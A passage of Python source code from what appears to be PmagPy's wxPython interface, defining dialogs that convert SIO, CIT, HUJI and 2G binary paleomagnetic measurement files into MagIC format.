LOC=\"\"\n\n #-----------\n\n LABFIELD=\" \"\n try:\n B_uT, DEC, INC = self.bSizer3.return_value().split()\n except ValueError:\n B_uT, DEC, INC = '0', '0', '0'\n\n #print \"B_uT, DEC, INC\", B_uT, DEC, INC\n options['labfield'], options['labfield_phi'], options['labfield_theta'] = B_uT, DEC, INC\n\n if EXP != \"Demag\":\n LABFIELD=\"-dc \" +B_uT+ \" \" + DEC + \" \" + INC\n\n #-----------\n\n #try: lat,lon = self.bSizer7.return_value().split()\n #except ValueError: lat,lon = '',''\n #options['lat'] = lat\n #options['lon'] = lon\n #lat = '-lat ' + lat\n #lon = '-lat ' + lon\n\n #-----------\n\n DONT_AVERAGE = \" \"\n if not self.bSizer8.return_value():\n DONT_AVERAGE = \"-A\"\n options['noave'] = 1\n else:\n options['noave'] = 0\n\n #-----------\n # some special\n\n SPEC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_specimens.txt\"\n SAMP_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_samples.txt\"\n SITE_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_sites.txt\"\n LOC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_locations.txt\"\n options['spec_file'] = SPEC_OUTFILE\n options['samp_file'] = SAMP_OUTFILE\n options['site_file'] = SITE_OUTFILE\n options['loc_file'] = LOC_OUTFILE\n\n COMMAND=\"generic_magic.py -WD %s -f %s -fsa er_samples.txt -F %s -exp %s -samp %s -site %s %s %s %s -Fsp %s -Fsa %s -Fsi %s -Flo %s \"\\\n %(WD,FILE,OUTFILE,EXP,SAMP,SITE,LOC,LABFIELD,DONT_AVERAGE, SPEC_OUTFILE, SAMP_OUTFILE, SITE_OUTFILE, LOC_OUTFILE)#, lat, lon)\n\n print(\"-I- Running Python command:\\n %s\"%COMMAND)\n program_run, error_message = convert.generic(**options)\n\n if program_run:\n pw.close_window(self, COMMAND, OUTFILE)\n else:\n pw.simple_warning(error_message)\n return False\n\n self.Destroy()\n self.parent.Raise()\n\n #def on_cancelButton(self,event):\n # self.Destroy()\n # self.parent.Raise()\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.generic.__doc__)\n\n def get_sample_name(self, specimen, sample_naming_convenstion):\n if sample_naming_convenstion[0] == \"sample=specimen\":\n sample = specimen\n elif sample_naming_convenstion[0] == \"no. of terminal characters\":\n n = int(sample_naming_convenstion[1]) * -1\n sample = specimen[:n]\n elif sample_naming_convenstion[0] == \"character delimited\":\n d = sample_naming_convenstion[1]\n sample_splitted = specimen.split(d)\n if len(sample_splitted) == 1:\n sample = sample_splitted[0]\n else:\n sample = d.join(sample_splitted[:-1])\n return sample\n\n def get_site_name(self, sample, site_naming_convention):\n if site_naming_convention[0] == \"site=sample\":\n site = sample\n elif site_naming_convention[0] == \"no. of terminal characters\":\n n = int(site_naming_convention[1])*-1\n site = sample[:n]\n elif site_naming_convention[0] == \"character delimited\":\n d = site_naming_convention[1]\n site_splitted = sample.split(d)\n if len(site_splitted) == 1:\n site = site_splitted[0]\n else:\n site = d.join(site_splitted[:-1])\n\n return site\n\nclass convert_SIO_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"\n convert SIO formatted measurement file to MagIC formated files\n \"\"\"\n\n def InitUI(self):\n pnl = self.panel\n TEXT = \"SIO Format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n# bSizer_info.Add(wx.StaticText(self), wx.ALIGN_LEFT)\n\n self.bSizer0 = pw.choose_file(pnl, method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.experiment_type(pnl)\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.specimen_n(pnl)\n\n #---sizer 4a ----\n self.bSizer4a = pw.select_ncn(pnl)\n\n #---sizer 5 ----\n TEXT=\"Location name:\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 11 ----\n #self.bSizer11 = pw.site_lat_lon(pnl)\n\n #---sizer 6 ---\n TEXT=\"Instrument name (optional):\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n\n #---sizer 8 ----\n\n TEXT = \"peak AF field (mT) if ARM: \"\n self.bSizer8 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 9 ----\n\n TEXT = \"Coil number for ASC impulse coil (if treatment units in Volts): \"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 10 ---\n #self.bSizer10 = pw.synthetic(pnl)\n\n #---sizer 10 ---\n TEXT = \"cooling rates [K/minutes] (seperated by comma) for cooling rate experiment:\"\n self.bSizer10 = pw.labeled_text_field(pnl, TEXT)\n\n #---buttons ----\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.Add(self.bSizer5, flag=wx.ALIGN_LEFT)\n #hbox0.Add(self.bSizer11, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n hbox0.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n hbox1 =wx.BoxSizer(wx.HORIZONTAL)\n hbox1.Add(self.bSizer8, flag=wx.ALIGN_LEFT)\n hbox1.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n hbox2 =wx.BoxSizer(wx.HORIZONTAL)\n hbox2.Add(self.bSizer10, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer4a, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(hbox1, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hbox2, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n SIO_file = self.bSizer0.return_value()\n if not SIO_file:\n pw.simple_warning('You must provide a SIO format file')\n return False\n options_dict['mag_file'] = str(SIO_file)\n magicoutfile=os.path.split(SIO_file)[1]+\".magic\"\n outfile =os.path.join(self.WD, magicoutfile)\n options_dict['meas_file'] = str(outfile)\n user = self.bSizer1.return_value()\n options_dict['user'] = str(user)\n if user:\n user = \"-usr \" + user\n experiment_type = self.bSizer2.return_value()\n options_dict['codelist'] = str(experiment_type)\n if experiment_type:\n experiment_type = \"-LP \" + experiment_type\n lab_field = self.bSizer3.return_value()\n if not lab_field.strip():\n lab_field = \"\"\n options_dict['labfield'] = 0\n options_dict['phi'] = 0\n options_dict['theta'] = 0\n else:\n lab_field_list = str(lab_field).split()\n options_dict['labfield'] = lab_field_list[0]\n options_dict['phi'] = lab_field_list[1]\n options_dict['theta'] = lab_field_list[2]\n lab_field = \"-dc \" + lab_field\n spc = self.bSizer4.return_value()\n options_dict['specnum'] = spc\n ncn = self.bSizer4a.return_value()\n options_dict['samp_con'] = ncn\n loc_name = self.bSizer5.return_value()\n options_dict['location'] = str(loc_name)\n if loc_name:\n loc_name = \"-loc \" + loc_name\n instrument = self.bSizer6.return_value()\n options_dict['instrument'] = str(instrument)\n if instrument:\n instrument = \"-ins \" + instrument\n replicate = self.bSizer7.return_value()\n if replicate:\n options_dict['noave'] = 0\n else:\n options_dict['noave'] = 1\n if replicate:\n replicate = ''\n else:\n replicate = '-A'\n peak_AF = self.bSizer8.return_value()\n if not peak_AF:\n peak_AF = 0\n options_dict['peakfield'] = peak_AF\n if peak_AF:\n peak_AF = \"-ac \" + peak_AF\n coil_number = self.bSizer9.return_value()\n options_dict['coil'] = coil_number\n if coil_number:\n coil_number = \"-V \" + coil_number\n cooling_rates=\"\"\n cooling_rates = self.bSizer10.return_value()\n options_dict['cooling_rates'] = cooling_rates\n\n lat, lon = '', ''\n #try: lat,lon = self.bSizer11.return_value().split()\n #except ValueError: pass\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n lat = '-lat ' + lat\n lon = '-lat ' + lon\n\n # Force -A option on cooling rate correction experiment\n if cooling_rates !=\"\" and experiment_type ==\"-LP CR\":\n replicate = '-A'\n options_dict['noave'] = 1\n\n SPEC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_specimens.txt\"\n SAMP_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_samples.txt\"\n SITE_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_sites.txt\"\n LOC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_locations.txt\"\n options_dict['spec_file'] = SPEC_OUTFILE\n options_dict['samp_file'] = SAMP_OUTFILE\n options_dict['site_file'] = SITE_OUTFILE\n options_dict['loc_file'] = LOC_OUTFILE\n\n COMMAND = \"sio_magic.py -F {0} -Fsp {1} -Fsa {2} -Fsi {3} -Flo {4} -f {5} -spc {6} -ncn {7} {8} {9} {10} {11} {12} {13} {14} {15} {16}\".format(outfile, SPEC_OUTFILE, SAMP_OUTFILE, SITE_OUTFILE, LOC_OUTFILE, SIO_file, spc, ncn, user, experiment_type, cooling_rates, loc_name, lab_field, peak_AF, coil_number, instrument, replicate)#, lat, lon)\n print(\"COMMAND\", COMMAND)\n # to run as module:\n if convert.sio(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.sio.__doc__)\n\n\nclass convert_CIT_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"Class that converts CIT files magnetometer files into MagIC format for analysis and archiving\"\"\"\n\n def InitUI(self):\n pnl = self.panel\n\n TEXT = \"CIT Format file (.sam)\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n TEXT=\"Measurer (optional):\"\n self.bSizer1 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 2 ----\n self.bSizer2 = pw.sampling_particulars(pnl)\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_ncn(pnl)\n\n #---sizer 5 ---\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer5 = pw.specimen_n(pnl)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n self.bSizer7.replicate_rb2.SetValue(True)\n\n #---sizer 9 ----\n TEXT=\"Number of measurement orientations (default=8)\"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n wd = self.WD\n options_dict['dir_path'] = wd\n full_file = self.bSizer0.return_value()\n if not full_file:\n pw.simple_warning('You must provide a CIT format file')\n return False\n input_directory, CIT_file = os.path.split(full_file)\n options_dict['magfile'] = CIT_file\n options_dict['input_dir_path'] = input_directory\n if input_directory:\n ID = \"-ID \" + input_directory\n else:\n ID = ''\n outfile = CIT_file + \".magic\"\n options_dict['meas_file'] = outfile\n samp_outfile = CIT_file[:CIT_file.find('.')] + \"_samples.txt\"\n options_dict['samp_file'] = samp_outfile\n spec_outfile = CIT_file[:CIT_file.find('.')] + \"_specimens.txt\"\n options_dict['spec_file'] = spec_outfile\n site_outfile = CIT_file[:CIT_file.find('.')] + \"_sites.txt\"\n options_dict['site_file'] = site_outfile\n loc_outfile = CIT_file[:CIT_file.find('.')] + \"_locations.txt\"\n options_dict['loc_file'] = loc_outfile\n user = self.bSizer1.return_value()\n options_dict['user'] = user\n dc_flag,dc_params = '',''\n if self.bSizer3.return_value() != '':\n dc_params = self.bSizer3.return_value().split()\n options_dict['labfield'] = dc_params[0]\n options_dict['phi'] = dc_params[1]\n options_dict['theta'] = dc_params[2]\n dc_flag = '-dc'\n if user:\n user = \"-usr \" + user\n spec_num = self.bSizer5.return_value()\n options_dict['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n loc_name = self.bSizer6.return_value()\n options_dict['locname'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n ncn = self.bSizer4.return_value()\n options_dict['samp_con'] = ncn\n particulars = self.bSizer2.return_value()\n options_dict['methods'] = particulars\n if particulars:\n particulars = \"-mcd \" + particulars\n replicate = self.bSizer7.return_value()\n if replicate:\n options_dict['noave'] = False\n replicate = ''\n else:\n options_dict['noave'] = True\n replicate = '-A'\n\n meas_n_orient = self.bSizer9.return_value()\n if meas_n_orient!='':\n try:\n int(meas_n_orient)\n options_dict['meas_n_orient'] = meas_n_orient\n except ValueError:\n pw.simple_warning(\"value for number of measured orienations must be a positive integer\")\n\n COMMAND = \"cit_magic.py -WD {} -f {} -F {} {} {} {} {} -ncn {} {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} {} {} -mno {}\".format(wd, CIT_file, outfile, particulars, spec_num, loc_name, user, ncn, ID, spec_outfile, samp_outfile, site_outfile, loc_outfile, replicate, dc_flag, dc_params, meas_n_orient)\n # to run as module:\n program_ran, error_message = convert.cit(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.cit.__doc__)\n\n\nclass convert_HUJI_files_to_MagIC(convert_files_to_MagIC):\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"HUJI format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n TEXT = \"HUJI sample orientation data file (Optional)\"\n bSizer_infoA = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_infoA.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0A ----\n self.bSizer0A = pw.choose_file(pnl, 'add', method = self.on_add_dat_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl)\n\n #---sizer 2 ----\n exp_names=['AF Demag', 'Thermal (includes thellier but not trm)', 'NRM only', 'TRM acquisition', 'Anisotropy experiment', 'Cooling rate experiment']\n self.bSizer2 = pw.experiment_type(pnl, exp_names)\n\n #---sizer 2a ---\n #for box in self.bSizer2.boxes:\n # self.Bind(wx.EVT_CHECKBOX, self.on_select_protocol, box)\n self.bSizer2a = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL )\n text = 'Cooling Rate (required only for cooling rate type experiments)\\nformat is xxx,yyy,zzz with no spaces '\n self.cooling_rate = wx.TextCtrl(pnl)\n self.bSizer2a.AddMany([wx.StaticText(pnl, label=text), self.cooling_rate])\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ---\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 5 ----\n self.bSizer5 = pw.select_ncn(pnl)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ---\n #TEXT = \"peak AF field (mT) if ARM: \"\n #self.bSizer7 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(bSizer_infoA, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0A, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n self.hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.bSizer2a.ShowItems(True)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_add_dat_file_button(self,event):\n text = \"HUJI sample orientation data file (Optional)\"\n pw.on_add_file_button(self.bSizer0A, text)\n\n def on_okButton(self, event):\n \"\"\"\n grab user input values, format them, and run huji_magic.py with the appropriate flags\n \"\"\"\n os.chdir(self.WD)\n options = {}\n HUJI_file = self.bSizer0.return_value()\n if not HUJI_file:\n pw.simple_warning(\"You must select a HUJI format file\")\n return False\n options['magfile'] = HUJI_file\n dat_file = self.bSizer0A.return_value()\n if os.path.isfile(dat_file): options['datafile'] = dat_file\n else: dat_file=\"\"\n magicoutfile=os.path.split(HUJI_file)[1]+\".magic\"\n outfile=os.path.join(self.WD, magicoutfile)\n options['meas_file'] = outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_specimens.txt\"\n spec_outfile=os.path.join(self.WD, magicoutfile)\n options['spec_file'] = spec_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_samples.txt\"\n samp_outfile=os.path.join(self.WD, magicoutfile)\n options['samp_file'] = samp_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_sites.txt\"\n site_outfile=os.path.join(self.WD, magicoutfile)\n options['site_file'] = site_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_locations.txt\"\n loc_outfile=os.path.join(self.WD, magicoutfile)\n options['loc_file'] = loc_outfile\n user = self.bSizer1.return_value()\n options['user'] = user\n if user:\n user = '-usr ' + user\n experiment_type = self.bSizer2.return_value()\n options['codelist'] = experiment_type\n if not experiment_type:\n pw.simple_warning(\"You must select an experiment type\")\n return False\n cooling_rate = self.cooling_rate.GetValue() or 0\n if cooling_rate:\n experiment_type = experiment_type + \" \" + cooling_rate\n lab_field = self.bSizer3.return_value()\n if not lab_field:\n lab_field = \"0 0 0\"\n lab_field_list = lab_field.split()\n options['labfield'] = lab_field_list[0]\n options['phi'] = lab_field_list[1]\n options['theta'] = lab_field_list[2]\n lab_field = '-dc ' + lab_field\n spc = self.bSizer4.return_value()\n options['specnum'] = spc or 0\n if not spc:\n spc = '-spc 0'\n else:\n spc = '-spc ' + spc\n ncn = self.bSizer5.return_value()\n options['samp_con'] = ncn\n loc_name = self.bSizer6.return_value()\n options['location'] = loc_name\n if loc_name:\n loc_name = '-loc ' + loc_name\n #peak_AF = self.bSizer7.return_value()\n #options['peakfield'] = peak_AF\n\n replicate = self.bSizer8.return_value()\n if replicate:\n options['noave'] = 0\n replicate = ''\n else:\n options['noave'] = 1\n replicate = '-A'\n\n COMMAND = \"huji_magic_new.py -f {} -fd {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} -LP {} {} -ncn {} {} {} {}\".format(HUJI_file, dat_file, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, user, experiment_type, loc_name, ncn, lab_field, spc, replicate)\n program_ran, error_message = convert.huji(**options)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.huji.__doc__())\n\n\nclass convert_2g_binary_files_to_MagIC(convert_files_to_MagIC):\n\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"Folder containing one or more 2g-binary format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n #self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n self.bSizer0 = pw.choose_dir(pnl, btn_text = 'add', method = self.on_add_dir_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 3 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_specimen_ocn(pnl)\n\n #---sizer 5 ----\n TEXT=\"Location name:\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ---\n TEXT=\"Instrument name (optional):\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n\n #---sizer 8 ----\n self.bSizer8 = pw.site_lat_lon(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl) # creates ok, cancel, help buttons and binds them to appropriate methods\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n #---button methods ---\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n WD = self.WD\n options_dict['dir_path'] = WD\n directory = self.bSizer0.return_value()\n options_dict['input_dir'] = directory\n if not directory:\n pw.simple_warning('You must select a directory containing 2g binary files')\n return False\n files = os.listdir(directory)\n files = [str(f) for f in files if str(f).endswith('.dat') or str(f).endswith('.DAT')]\n if not files:\n pw.simple_warning('No .dat files found in {}'.format(directory))\n return False\n ID = \"-ID \" + directory\n if self.bSizer1.return_value():\n particulars = self.bSizer1.return_value()\n options_dict['gmeths'] = particulars\n mcd = '-mcd ' + particulars\n else:\n mcd = ''\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer3.return_value()\n options_dict['specnum'] = spc or 0\n if not spc:\n spc = '-spc 1'\n else:\n spc = '-spc ' + spc\n ocn = self.bSizer4.return_value()\n options_dict['or_con'] = ocn\n loc_name = self.bSizer5.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n instrument = self.bSizer6.return_value()\n options_dict['inst'] = instrument\n if instrument:\n instrument = \"-ins \" + instrument\n replicate = self.bSizer7.return_value()\n if replicate:\n replicate = '-a'\n options_dict['noave'] = 0\n else:\n replicate = ''\n options_dict['noave'] = 1\n for f in files:\n file_2g_bin = f\n outfile = file_2g_bin + \".magic\"\n options_dict['meas_file'] = outfile\n options_dict['mag_file'] = f\n spec_outfile = file_2g_bin + \"_specimens.txt\"\n samp_outfile = file_2g_bin + \"_samples.txt\"\n site_outfile = file_2g_bin + \"_sites.txt\"\n loc_outfile = file_2g_bin + \"_locations.txt\"\n options_dict['spec_file'] = spec_outfile\n options_dict['samp_file'] = samp_outfile\n options_dict['site_file'] = site_outfile\n options_dict['loc_file'] = loc_outfile\n COMMAND = \"_2g_bin_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -ncn {} {} {} -ocn {} {} {} {} {} -lat {} -lon {}\".format(WD, file_2g_bin, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, ncn, mcd, spc, ocn, loc_name, replicate, ID, instrument,lat,lon)\n if files.index(f) == (len(files) - 1): # terminate process on last file call\n # to run as module:\n if convert._2g_bin(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n else:\n print(\"Running equivalent of python command: \", COMMAND)\n if convert._2g_bin(**options_dict):\n pass # success, continue on to next file\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert._2g_bin.__doc__)\n\n # to run as command line:\n #pw.on_helpButton(\"_2g_bin_magic.py -h\")\n\n\nclass convert_2g_ascii_files_to_MagIC(convert_files_to_MagIC):\n\n def InitUI(self):\n\n pnl = self.panel\n\n 